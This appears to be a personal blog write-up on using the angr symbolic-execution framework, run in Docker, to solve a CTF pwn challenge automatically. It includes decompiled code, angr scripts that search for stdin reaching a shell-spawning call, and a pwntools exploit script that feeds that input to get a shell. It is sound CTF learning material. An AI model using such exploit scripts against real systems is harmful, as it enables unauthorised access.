zer0_1s

Never stop exploring

auto pwn

This actually started when I saw i0gan from the D0g3 lab introduce an example of auto pwn for binary vulnerability mining, and I really wanted to see what it was all about.

1. The angr Python framework

What is angr?
angr is a python framework for analyzing binaries. It combines both static and dynamic symbolic ("concolic") analysis, making it applicable to a variety of tasks.

It is brought to you by the Computer Security Lab at UC Santa Barbara, SEFCOM at Arizona State University, their associated CTF team, Shellphish, the open source community, and @rhelmot.

"Concolic" is a portmanteau of concrete and symbolic. Concolic testing is a hybrid software verification technique that combines symbolic execution (treating program variables as symbolic values) with concrete execution (running on specific inputs).

2. Setting up the angr environment

install docker

curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun

docker pull

docker pull angr/angr
./setup.sh -i -e angr   # alternative to docker: angr-dev's setup.sh creates a local virtualenv named angr

# how to use angr in docker
docker run -itd --name angr angr/angr
docker exec -it angr bash
su angr # the root user has no angr environment; switch to the angr user

#!/bin/sh
# Author: i0gan
# for starting docker angr
# usage: angr script.py [arg ...]
# ctf_name: optional sub-directory holding the challenge files (empty = current directory)
if [ $# -lt 1 ]; then
    echo "Usage: angr script.py [arg ...]"
    exit 1
fi
script=$1
shift
docker run -it \
    -u angr \
    --rm \
    -v "$(pwd)/${ctf_name}":/ctf/work \
    -w /ctf/work angr/angr "/home/angr/.virtualenvs/angr/bin/python" "/ctf/work/$script" "$@"

# start pwndocker for running the challenge binary and the exploit
# (23946 is the default port of IDA's remote debug server; ptrace and an
#  unconfined seccomp profile are needed for gdb inside the container)
docker run -it \
    --rm \
    -v "$(pwd)/${ctf_name}":/ctf/work \
    -p 23946:23946 \
    --privileged \
    --cap-add=SYS_PTRACE \
    --security-opt seccomp=unconfined \
    pwndocker

3. Getting to know angr

Learning angr (1)

4. An example of automated PWN challenge mining

AUTO PWN | Issue 34

Thanks to the D0g3 master from 成信 for quickly providing the corresponding challenge.

root@DESKTOP-4VN4G0C:/Desktop/pwn# checksec pwn1
[*] '/Desktop/pwn/pwn1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)

Below is the decompiled code from IDA; next, let's analyze its logic:

int sub_804870E()
{
  int result; // eax
  char v1; // [esp+Ch] [ebp-1Ch]
  int v2; // [esp+1Ch] [ebp-Ch]

  result = atoi(&input);                  // a bare '\n' gives 0, so it lands in case 0; 1 and 2 are the other branches
  v2 = result;
  switch ( result )
  {
    case 1:
      puts("logging out...");
      result = ~dword_804A06C;            // the flag is bitwise-inverted, not cleared: ~0 is non-zero
      dword_804A06C = ~dword_804A06C;
      break;
    case 2:
      if ( dword_804A06C )
        result = sub_80486F5();           // spawns a shell
      else
        result = puts("please log in");
      break;
    case 0:
      puts("input your passwd:");
      result = sub_804859B((int)&v1, 16); // in theory this reads a password, but nothing is compared, so the password cannot be known
      dword_804A06C = 1;                  // the key variable gating the shell
      break;
  }
  return result;
}

The method the D0g3 master gave is to use the angr framework to reach the shell function: all we need is for execution to arrive at the block highlighted in red in IDA, i.e. the call to the shell function at the target address below.
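To make the search angr performs concrete, here is an added example (my own code, not from the post or from D0g3) that models sub_804870E in pure Python and enumerates short stdin sequences until one reaches the shell call. The function names are mine, the password read in case 0 is abstracted to "sets the flag" (the model does not account for the extra line that read would consume on the real binary), and it goes a little beyond the post by listing every shortest path, including the one that relies on the inverted-flag "log out" bug.

```python
# Added example: a pure-Python model of the decompiled menu handler.
# It does by brute-force enumeration what angr does symbolically on the
# real binary: find stdin that drives execution to the shell call.
from itertools import product

SHELL = "shell"                       # outcome when case 2 runs with the flag set
MENU_INPUTS = ["0", "1", "2", "x"]    # atoi("x") == 0, so "x" behaves like "0"


def step(logged_in, line):
    """One pass of the handler. `logged_in` models dword_804A06C (a 32-bit
    int), `line` is the text handed to atoi. Returns (new_flag, outcome)."""
    try:
        choice = int(line)
    except ValueError:
        choice = 0                    # atoi() of a non-numeric line is 0
    if choice == 1:
        # "logging out...": the flag is bitwise-inverted, not cleared.
        # ~0 is 0xFFFFFFFF (non-zero), so a single "1" actually logs you IN.
        return (~logged_in) & 0xFFFFFFFF, "toggled"
    if choice == 2:
        if logged_in:
            return logged_in, SHELL   # sub_80486F5() is called
        return logged_in, "please log in"
    if choice == 0:
        # sub_804859B reads a "password" but never compares it; the flag is
        # then set to 1 unconditionally (password read abstracted away here).
        return 1, "password read"
    return logged_in, "no-op"         # any other value falls out of the switch


def reaches_shell(path):
    """True if feeding the lines in `path` (in order) hits the shell call."""
    flag = 0                          # dword_804A06C starts zeroed (.bss)
    for line in path:
        flag, outcome = step(flag, line)
        if outcome == SHELL:
            return True
    return False


def shortest_shell_paths(max_depth=3):
    """Breadth-first enumeration of input sequences; returns all of the
    shortest ones that reach the shell, as tuples of menu lines."""
    for depth in range(1, max_depth + 1):
        hits = [p for p in product(MENU_INPUTS, repeat=depth) if reaches_shell(p)]
        if hits:
            return hits
    return []


def stdin_bytes(path):
    """Serialise a path the way the program consumes it (one line per
    choice); this is the shape angr's posix.dumps(0) returns for a found state."""
    return "".join(line + "\n" for line in path).encode()


if __name__ == "__main__":
    for p in shortest_shell_paths():
        print(p, stdin_bytes(p).hex())
```

Running it lists the two-line paths ("0","2"), ("1","2") and ("x","2"); the hex of ("1","2") is exactly the 310a320a that the angr script prints and the exploit below replays. The model also shows why "1","1","2" fails: two inversions bring the flag back to zero.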

target_addr = 0x08048783

import angr
from binascii import b2a_hex
import logging
#logging.getLogger('angr').setLevel('INFO')
logging.getLogger('angr').setLevel('CRITICAL')   # silence angr's warnings

def angr_main():
    pj = angr.Project('./pwn1')                   # load the challenge binary (No PIE, so IDA addresses are real)
    state = pj.factory.entry_state()              # start at the ELF entry point with symbolic stdin
    simgr = pj.factory.simgr(state)
    simgr.explore(find=0x08048783)                # call shell: stop when a path reaches this address
    p = simgr.found[0].posix.dumps(0)             # concrete stdin that drives the found path
    print(b2a_hex(p).decode(), end='')            # hex so it can be pasted into the exploit
angr_main()

root@DESKTOP-4VN4G0C:/Desktop/pwn# docker cp /Desktop/pwn/pwn1 1e40bd134aa7:/home
root@DESKTOP-4VN4G0C:/Desktop/pwn# docker cp /Desktop/pwn/script.py 1e40bd134aa7:/home

from pwn import *
from binascii import a2b_hex

io = process('./pwn1')
print('Solving...')
payload = a2b_hex('310a320a')   # the stdin angr found, b'1\n2\n': "1" inverts the login flag to non-zero, "2" spawns the shell
io.send(payload)
print('Get shell')
io.sendline(b'whoami')
io.interactive()

import angr
from binascii import b2a_hex
import logging
#logging.getLogger('angr').setLevel('INFO')
logging.getLogger('angr').setLevel('CRITICAL')

def angr_main():
    pj = angr.Project('./find_flag')
    state = pj.factory.entry_state()
    simgr = pj.factory.simgr(state)
    # call shell. 0x1229 is the IDA file offset; if find_flag is a PIE binary,
    # angr rebases it (0x400000 by default), so the target would then be
    # pj.loader.main_object.mapped_base + 0x1229 instead of the raw offset.
    simgr.explore(find=0x1229)
    p = simgr.found[0].posix.dumps(0)             # stdin of the state that reached the target
    print(b2a_hex(p).decode(), end='')
angr_main()

This throwaway post is really just to test the xLog platform. Although I will no longer be competing in the CTF binary direction, I may still keep an eye on interesting topics and research in this area.
